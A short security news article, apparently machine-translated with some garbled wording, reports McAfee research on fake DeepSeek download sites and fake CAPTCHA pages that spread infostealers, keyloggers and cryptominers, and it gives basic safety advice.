- McAfee’s researchers find a “cocktail” of malware hiding behind fake Deepseek -Apps
- The campaign rows on people searching for the generative AI tool
- Infostealers, Crypto -Mine Workers and More Inserted In This Way
Hype around Deepseek is the next big thing cyber criminals are utilizing in their hacking campaigns, says researchers from McAfee Labs.
The team has outlined how they saw cyber criminals created different sites and offer different versions of Deepseek for download. Victims would reach out to these sites through search engines, which means some SEO poisoning was also involved in the campaign.
When they reach the websites and download the software, the victims are infected with a “cocktail of malware”, ranging from keyloggers and password stealers, to coingreen workers. These malware variants can steal sensitive information (including banking information and cryptocurrency -tektogsinformation) and can force the infected computer to my cryptocurrency, making it useless for virtually everything else.
Fake CAPTCHA
While on some sites, the victims are invited to download a Deepseek app or program on others -the devil is in CAPTCHA.
In some cases observed by McAfee, the victims would visit a site with a captcha that can be “resolved” by copying and inserting a command in the RUN program on Windows. This command downloads and runs a malware dropper.
To remain in safety, be aware of all times. Instead of “Google” for something, visit the site directly and if you do not know the address, examine each link returned by the search engine.
Furthermore, a real CAPTCHA will never ask you to insert a command into the Run program.
Hackers are known for tapping on current trends to distribute malware. Similar campaigns were observed when Chat-GPT was first released, both for Windows and Android.
Big events, such as Black Friday and Cyber Monday, the Olympic Games, the World Cup and others, have all been abused in the past. Covid-19 Breakout, Russo Ukrainian War and the US presidential election all served as platforms for information theft, malware distribution and wire fraud.
